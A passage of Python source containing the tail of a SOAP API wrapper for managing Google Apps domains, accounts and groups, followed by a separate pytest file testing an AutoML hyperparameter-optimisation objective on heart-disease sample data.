return self._client.service.SyncSettingsUnitAll({"ID_Login": ID_Login, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID": ID, "ID_Unit": ID_Unit})
# Delete a unit in Google group settings
def SyncSettingsUnitDelete(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_Unit, Units=None, Unit=None, RegistrationNumber=None, DisplayName=None):
return self._client.service.SyncSettingsUnitDelete({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_Unit": ID_Unit, "Units": Units, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName})
# Create a unit in Google group settings
def SyncSettingsUnitInsert(self, ID_Login, ID, ID_GoogleGroupSyncSettings, ID_Unit, Units=None, Unit=None, RegistrationNumber=None, DisplayName=None):
return self._client.service.SyncSettingsUnitInsert({"ID_Login": ID_Login, "ID": ID, "ID_GoogleGroupSyncSettings": ID_GoogleGroupSyncSettings, "ID_Unit": ID_Unit, "Units": Units, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName})
# No documentation
def SyncTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.SyncTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Load the list of GA accounts to be deleted
def GoogleAccountAllInactive(self, ID_Login):
return self._client.service.GoogleAccountAllInactive({"ID_Login": ID_Login})
# Load the list of GA groups to be deleted
def GoogleGroupAllInactive(self, ID_Login):
return self._client.service.GoogleGroupAllInactive({"ID_Login": ID_Login})
# Load the list of domain administrators
def DomainAdminAll(self, ID_Login, ID_Domain, ID, ID_Person):
return self._client.service.DomainAdminAll({"ID_Login": ID_Login, "ID_Domain": ID_Domain, "ID": ID, "ID_Person": ID_Person})
# Load the list of domain administrators
def DomainAdminAllPerson(self, ID_Login, ID_Domain, ID, ID_Person):
return self._client.service.DomainAdminAllPerson({"ID_Login": ID_Login, "ID_Domain": ID_Domain, "ID": ID, "ID_Person": ID_Person})
# Delete a domain administrator
def DomainAdminDelete(self, ID_Login, ID):
return self._client.service.DomainAdminDelete({"ID_Login": ID_Login, "ID": ID})
# Create a domain administrator
def DomainAdminInsert(self, ID_Login, ID, ID_Domain, ID_Person, Domain=None, Person=None):
return self._client.service.DomainAdminInsert({"ID_Login": ID_Login, "ID": ID, "ID_Domain": ID_Domain, "ID_Person": ID_Person, "Domain": Domain, "Person": Person})
# Load the list of domains
def DomainAll(self, ID_Login, ID, ID_Unit, DisplayName=None, ID_DomainState=None):
return self._client.service.DomainAll({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DisplayName": DisplayName, "ID_DomainState": ID_DomainState})
# Load the list of domains available to a person
def DomainAllPerson(self, ID_Login, ID_Person, CanGoogleAccount):
return self._client.service.DomainAllPerson({"ID_Login": ID_Login, "ID_Person": ID_Person, "CanGoogleAccount": CanGoogleAccount})
# Load the list of a unit's domains
def DomainAllUnit(self, ID_Login, ID, ID_Unit, DisplayName=None, ID_DomainState=None):
return self._client.service.DomainAllUnit({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DisplayName": DisplayName, "ID_DomainState": ID_DomainState})
# Load the list of domains on which the user can create an account for the given unit
def DomainAllUnitCreate(self, ID_Login, ID_Unit, CanGoogleAccount):
return self._client.service.DomainAllUnitCreate({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "CanGoogleAccount": CanGoogleAccount})
# Load domain detail
def DomainDetail(self, ID_Login, ID):
return self._client.service.DomainDetail({"ID_Login": ID_Login, "ID": ID})
# Load the e-mails created under the domain
def DomainDetailEmails(self, ID_Login, ID):
return self._client.service.DomainDetailEmails({"ID_Login": ID_Login, "ID": ID})
# Create a domain
def DomainInsert(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Load the list of domain states
def DomainStateAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.DomainStateAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Load the list of units assigned to the domain
def DomainUnitAll(self, ID_Login, ID_Domain, ID, ID_Unit):
return self._client.service.DomainUnitAll({"ID_Login": ID_Login, "ID_Domain": ID_Domain, "ID": ID, "ID_Unit": ID_Unit})
# Delete a unit assigned to the domain
def DomainUnitDelete(self, ID_Login, ID):
return self._client.service.DomainUnitDelete({"ID_Login": ID_Login, "ID": ID})
# Create a unit assigned to the domain
def DomainUnitInsert(self, ID_Login, ID, ID_Domain, ID_Unit, IncludeChildUnit, Domain=None, Unit=None, RegistrationNumber=None):
return self._client.service.DomainUnitInsert({"ID_Login": ID_Login, "ID": ID, "ID_Domain": ID_Domain, "ID_Unit": ID_Unit, "IncludeChildUnit": IncludeChildUnit, "Domain": Domain, "Unit": Unit, "RegistrationNumber": RegistrationNumber})
# Update a domain
def DomainUpdate(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Send the domain request to headquarters
def DomainUpdateActivate(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateActivate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Update a domain alias
def DomainUpdateAlias(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateAlias({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Send a domain request to headquarters
def DomainUpdateApprove(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateApprove({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Update a domain's DNS record
def DomainUpdateDNS(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateDNS({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Enable GA on a domain
def DomainUpdateEnableGA(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateEnableGA({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Send a domain request to headquarters
def DomainUpdateSend(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateSend({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Update who may create accounts on a domain
def DomainUpdateUsing(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateUsing({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Load the list of a person's contacts
def GoogleAccountAll(self, ID_Login, ID_Person, ID, IsMain):
return self._client.service.GoogleAccountAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "IsMain": IsMain})
# Load the list of a person's contacts
def GoogleAccountAllUnit(self, ID_Login, ID_Unit, ID, IsMain, ID_GoogleAccountMain, IncludeChildUnits):
return self._client.service.GoogleAccountAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "IsMain": IsMain, "ID_GoogleAccountMain": ID_GoogleAccountMain, "IncludeChildUnits": IncludeChildUnits})
# Delete an account in GA
def GoogleAccountDelete(self, ID_Login, ID):
return self._client.service.GoogleAccountDelete({"ID_Login": ID_Login, "ID": ID})
# Delete a main account in GA
def GoogleAccountDeleteMain(self, ID_Login, ID_Person, ID_GoogleAccount):
return self._client.service.GoogleAccountDeleteMain({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_GoogleAccount": ID_GoogleAccount})
# Load the detail of a unit's main GA account
def GoogleAccountDetail(self, ID_Login, ID):
return self._client.service.GoogleAccountDetail({"ID_Login": ID_Login, "ID": ID})
# Load the list of a person's contacts
def GoogleAccountDetailExists(self, ID_Login, IsMain, OnlyDb, Email=None):
return self._client.service.GoogleAccountDetailExists({"ID_Login": ID_Login, "IsMain": IsMain, "OnlyDb": OnlyDb, "Email": Email})
# Load the detail of a person's main GA account
def GoogleAccountDetailMain(self, ID_Login, ID_Person, LoadMainEmail):
return self._client.service.GoogleAccountDetailMain({"ID_Login": ID_Login, "ID_Person": ID_Person, "LoadMainEmail": LoadMainEmail})
# Create a GA account for a person
def GoogleAccountInsert(self, ID_Login, ID, ID_Person, ID_Unit, ID_Domain, IsMain, IsMainContact, Agrees, ID_UnitContact, ID_PersonContact, ID_PersonCreated, DateCreated, ID_GoogleAccount, OnlyValidate, Person=None, Unit=None, UserName=None, Domain=None, Password=None, Password2=None, PersonCreated=None, Value=None, LoginUrl=None, DisplayNameFirst=None, DisplayNameLast=None):
return self._client.service.GoogleAccountInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_Domain": ID_Domain, "IsMain": IsMain, "IsMainContact": IsMainContact, "Agrees": Agrees, "ID_UnitContact": ID_UnitContact, "ID_PersonContact": ID_PersonContact, "ID_PersonCreated": ID_PersonCreated, "DateCreated": DateCreated, "ID_GoogleAccount": ID_GoogleAccount, "OnlyValidate": OnlyValidate, "Person": Person, "Unit": Unit, "UserName": UserName, "Domain": Domain, "Password": Password, "Password2": Password2, "PersonCreated": PersonCreated, "Value": Value, "LoginUrl": LoginUrl, "DisplayNameFirst": DisplayNameFirst, "DisplayNameLast": DisplayNameLast})
# Force a password change at the next GA sign-in
def GoogleAccountUpdateChangePassword(self, ID_Login, ID, ID_Person, ID_Unit, ID_Domain, IsMain, IsMainContact, Agrees, ID_UnitContact, ID_PersonContact, ID_PersonCreated, DateCreated, ID_GoogleAccount, OnlyValidate, Person=None, Unit=None, UserName=None, Domain=None, Password=None, Password2=None, PersonCreated=None, Value=None, LoginUrl=None, DisplayNameFirst=None, DisplayNameLast=None):
return self._client.service.GoogleAccountUpdateChangePassword({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_Domain": ID_Domain, "IsMain": IsMain, "IsMainContact": IsMainContact, "Agrees": Agrees, "ID_UnitContact": ID_UnitContact, "ID_PersonContact": ID_PersonContact, "ID_PersonCreated": ID_PersonCreated, "DateCreated": DateCreated, "ID_GoogleAccount": ID_GoogleAccount, "OnlyValidate": OnlyValidate, "Person": Person, "Unit": Unit, "UserName": UserName, "Domain": Domain, "Password": Password, "Password2": Password2, "PersonCreated": PersonCreated, "Value": Value, "LoginUrl": LoginUrl, "DisplayNameFirst": DisplayNameFirst, "DisplayNameLast": DisplayNameLast})
# Change the password
def GoogleAccountUpdatePassword(self, ID_Login, ID, ID_Person, ID_Unit, ID_Domain, IsMain, IsMainContact, Agrees, ID_UnitContact, ID_PersonContact, ID_PersonCreated, DateCreated, ID_GoogleAccount, OnlyValidate, Person=None, Unit=None, UserName=None, Domain=None, Password=None, Password2=None, PersonCreated=None, Value=None, LoginUrl=None, DisplayNameFirst=None, DisplayNameLast=None):
return self._client.service.GoogleAccountUpdatePassword({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_Domain": ID_Domain, "IsMain": IsMain, "IsMainContact": IsMainContact, "Agrees": Agrees, "ID_UnitContact": ID_UnitContact, "ID_PersonContact": ID_PersonContact, "ID_PersonCreated": ID_PersonCreated, "DateCreated": DateCreated, "ID_GoogleAccount": ID_GoogleAccount, "OnlyValidate": OnlyValidate, "Person": Person, "Unit": Unit, "UserName": UserName, "Domain": Domain, "Password": Password, "Password2": Password2, "PersonCreated": PersonCreated, "Value": Value, "LoginUrl": LoginUrl, "DisplayNameFirst": DisplayNameFirst, "DisplayNameLast": DisplayNameLast})
# Load the list of Google groups
def GoogleGroupAll(self, ID_Login, ID_Unit, ID, ID_GoogleGroupMain, IncludeChildUnits, DisplayName=None):
return self._client.service.GoogleGroupAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_GoogleGroupMain": ID_GoogleGroupMain, "IncludeChildUnits": IncludeChildUnits, "DisplayName": DisplayName})
# Delete a Google group
def GoogleGroupDelete(self, ID_Login, ID):
return self._client.service.GoogleGroupDelete({"ID_Login": ID_Login, "ID": ID})
# Delete a user from a Google group
def GoogleGroupDeleteMember(self, ID_Login, ID, Email=None):
return self._client.service.GoogleGroupDeleteMember({"ID_Login": ID_Login, "ID": ID, "Email": Email})
# Load the detail of a Google group
def GoogleGroupDetail(self, ID_Login, ID):
return self._client.service.GoogleGroupDetail({"ID_Login": ID_Login, "ID": ID})
# Create a Google group
def GoogleGroupInsert(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Update a Google group
def GoogleGroupUpdate(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Save group members by email
def GoogleGroupUpdateMemberEmail(self, ID_Login, ID, EmailArray=None):
return self._client.service.GoogleGroupUpdateMemberEmail({"ID_Login": ID_Login, "ID": ID, "EmailArray": EmailArray})
# Save a person as a group member
def GoogleGroupUpdateMemberPerson(self, ID_Login, ID, ID_Person):
return self._client.service.GoogleGroupUpdateMemberPerson({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person})
# Update a user's role
def GoogleGroupUpdateMemberRole(self, ID_Login, ID, IsOwner, Email=None):
return self._client.service.GoogleGroupUpdateMemberRole({"ID_Login": ID_Login, "ID": ID, "IsOwner": IsOwner, "Email": Email})
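# --- Usage sketch (illustrative only) ---
# A minimal, hypothetical example of driving the wrappers above. It assumes
# these methods live on a wrapper class built around a zeep SOAP client;
# "SkautisApi" and the WSDL URL are placeholder names introduced here, not
# confirmed by this file.
#
#   from zeep import Client
#
#   api = SkautisApi()                                         # hypothetical wrapper class
#   api._client = Client("https://example.org/service.wsdl")   # hypothetical WSDL
#   # List the domain states visible to the given login session:
#   states = api.DomainStateAll(ID_Login="<login-guid>")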
# File: tests/test_hpo/test_hpo.py (repo: PanyiDong/AutoML, Python, MIT license)
"""
File: test_regression.py
Author: Panyi Dong
GitHub: https://github.com/PanyiDong/
Mathematics Department, University of Illinois at Urbana-Champaign (UIUC)
Project: My_AutoML
Latest Version: 0.2.0
Relative Path: /tests/test_hpo/test_regression.py
File Created: Sunday, 10th April 2022 12:00:04 pm
Author: Panyi Dong (panyid2@illinois.edu)
-----
Last Modified: Wednesday, 11th May 2022 9:45:00 am
Modified By: Panyi Dong (panyid2@illinois.edu)
-----
MIT License
Copyright (c) 2022 - 2022, Panyi Dong
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
from ray import tune
import My_AutoML
from My_AutoML import load_data
# Use command-line interaction to run the model: apparently the same class
# object, called twice within one test case, will not run the model correctly
# after the first time. Instead, we detect whether the optimal-setting file
# exists as a way of determining whether the model was fitted correctly
# (see the small helper sketch below the commented-out test).
# def test_stroke():
# os.system(
# "python main.py --data_folder Appendix --train_data healthcare-dataset-stroke-data --response stroke"
# )
# assert (
# os.path.exists("tmp/healthcare-dataset-stroke-data_model/init.txt") == True
# ), "Classification for Stroke data failed to initiated."
# # assert (
# # mol_heart._fitted == True
# # ), "Classification for Heart data failed to fit."
# assert (
# os.path.exists("tmp/healthcare-dataset-stroke-data_model/optimal_setting.txt")
# == True
# ), "Classification for Stroke data failed to find optimal setting."
def test_objective_1():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_1",
task_mode="classification",
objective="accuracy",
validation=True,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_2():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_2",
task_mode="classification",
objective="auc",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
